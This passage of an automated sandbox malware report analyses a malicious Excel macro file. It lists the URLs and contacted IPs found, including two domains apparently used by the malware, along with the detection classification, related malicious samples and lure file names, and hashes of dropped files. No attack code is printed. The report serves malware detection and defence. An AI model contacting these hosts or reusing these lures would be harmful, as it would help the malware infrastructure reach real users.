                                                                                                                https://storage.live.com/clientlogs/uploadlocation4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/log4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorize4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v24BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorize4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      192.185.5.2
                                                                                                                                                      dentistelmhurstny.comUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                      192.185.20.98
                                                                                                                                                      legalopspr.comUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                      Analysis ID:403410
                                                                                                                                                      Start date:04.05.2021
                                                                                                                                                      Start time:05:33:32
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 7m 46s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:catalog-1521295750.xlsm
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:25
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal76.troj.expl.evad.winXLSM@5/13@2/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xlsm
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      192.185.5.2catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                        statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                          statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                            f.xlsmGet hashmaliciousBrowse
                                                                                                                                                              f.xlsmGet hashmaliciousBrowse
                                                                                                                                                                statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                        diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                              diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                diagram-136896931.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  diagram-136896931.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    diagram-993959417.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      diagram-993959417.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        diagram-1145261761.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          diagram-1145261761.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            diagram-397813623.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              192.185.20.98catalog-1521295750.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                Domains

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                legalopspr.comcatalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.20.98

                                                                                                                                                                                                ASN

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                UNIFIEDLAYER-AS-1UScatalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 50.87.166.59
                                                                                                                                                                                                c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 108.179.242.122
                                                                                                                                                                                                c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 108.179.242.122
                                                                                                                                                                                                6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.24.47
                                                                                                                                                                                                DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.169.22
                                                                                                                                                                                                generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.177.61
                                                                                                                                                                                                4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.24.47
                                                                                                                                                                                                QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.131.134
                                                                                                                                                                                                gunzipped.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.189.182
                                                                                                                                                                                                Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.144.13.239
                                                                                                                                                                                                0145d964_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.169.22
                                                                                                                                                                                                HXxk3mzZeW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.140.111
                                                                                                                                                                                                HCU213DES.docGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.169.22
                                                                                                                                                                                                RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.236.251
                                                                                                                                                                                                a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.221.204
                                                                                                                                                                                                Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.129.69
                                                                                                                                                                                                FULL SOA $16848.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                                                BL Draft - HL-88312627.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.180.165
                                                                                                                                                                                                ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.185.244
                                                                                                                                                                                                UNIFIEDLAYER-AS-1UScatalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 50.87.166.59
                                                                                                                                                                                                c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 108.179.242.122
                                                                                                                                                                                                c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 108.179.242.122
                                                                                                                                                                                                6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.24.47
                                                                                                                                                                                                DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.169.22
                                                                                                                                                                                                generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.177.61
                                                                                                                                                                                                4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.24.47
                                                                                                                                                                                                QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.131.134
                                                                                                                                                                                                gunzipped.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.189.182
                                                                                                                                                                                                Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.144.13.239
                                                                                                                                                                                                0145d964_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.169.22
                                                                                                                                                                                                HXxk3mzZeW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.140.111
                                                                                                                                                                                                HCU213DES.docGet hashmaliciousBrowse
                                                                                                                                                                                                • 162.241.169.22
                                                                                                                                                                                                RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.236.251
                                                                                                                                                                                                a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.221.204
                                                                                                                                                                                                Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.129.69
                                                                                                                                                                                                FULL SOA $16848.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                                                BL Draft - HL-88312627.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.180.165
                                                                                                                                                                                                ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.254.185.244

                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                Tree Top.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                PT6-1152.docGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                s.dllGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                setup-lightshot.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                s.dllGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                pic05678063.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                e17486cd_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                Purchase Order comfirmation to issue INVOICE.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                jX16Cu330u.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                5jHZqgYHCZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                z3LOkpYy4s.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                dl6jAtWJeR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98
                                                                                                                                                                                                YVNw1T4L7m.exeGet hashmaliciousBrowse
                                                                                                                                                                                                • 192.185.5.2
                                                                                                                                                                                                • 192.185.20.98

                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                No context

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4BDFB115-4685-4F97-99A9-00A0FF14FF48
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):134558
                                                                                                                                                                                                Entropy (8bit):5.368390537627366
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:3cQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:8EQ9DQW+zPXO8
                                                                                                                                                                                                MD5:2D4F587199E495269D56C39F532E911C
                                                                                                                                                                                                SHA1:91E7651D598AFEBB1C8695AE802A18AEA75586B9
                                                                                                                                                                                                SHA-256:F2D94329D179BB6B87CAFF749DC3BFA6AA7CB69D5ACA40EFECA8E0857DE9D4AB
                                                                                                                                                                                                SHA-512:18508C9E951312A720B9A8D1078D6F3776744ED2268225D07BB30A8EC18B63188357DEDC51667E1216EBAFD90EAC497EA93000E2F05B1416D69B0297B4DB3B0D
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T03:34:28">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5EDD1F14.png
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                Entropy (8bit):7.595467031611744
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                                                MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                                                SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                                                SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                                                SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9A38BE96.png
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):34787
                                                                                                                                                                                                Entropy (8bit):7.9883689087667955
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                                                                                                                                                MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                                                                                                                                                SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                                                                                                                                                SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                                                                                                                                                SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C78DE0A9.png
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):8301
                                                                                                                                                                                                Entropy (8bit):7.970711494690041
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                                                MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                                                SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                                                SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                                                SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D77719F.png
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):557
                                                                                                                                                                                                Entropy (8bit):7.343009301479381
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                                                MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                                                SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                                                SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                                                SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\suspendedpage[1].htm
                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                File Type:HTML document, ASCII text
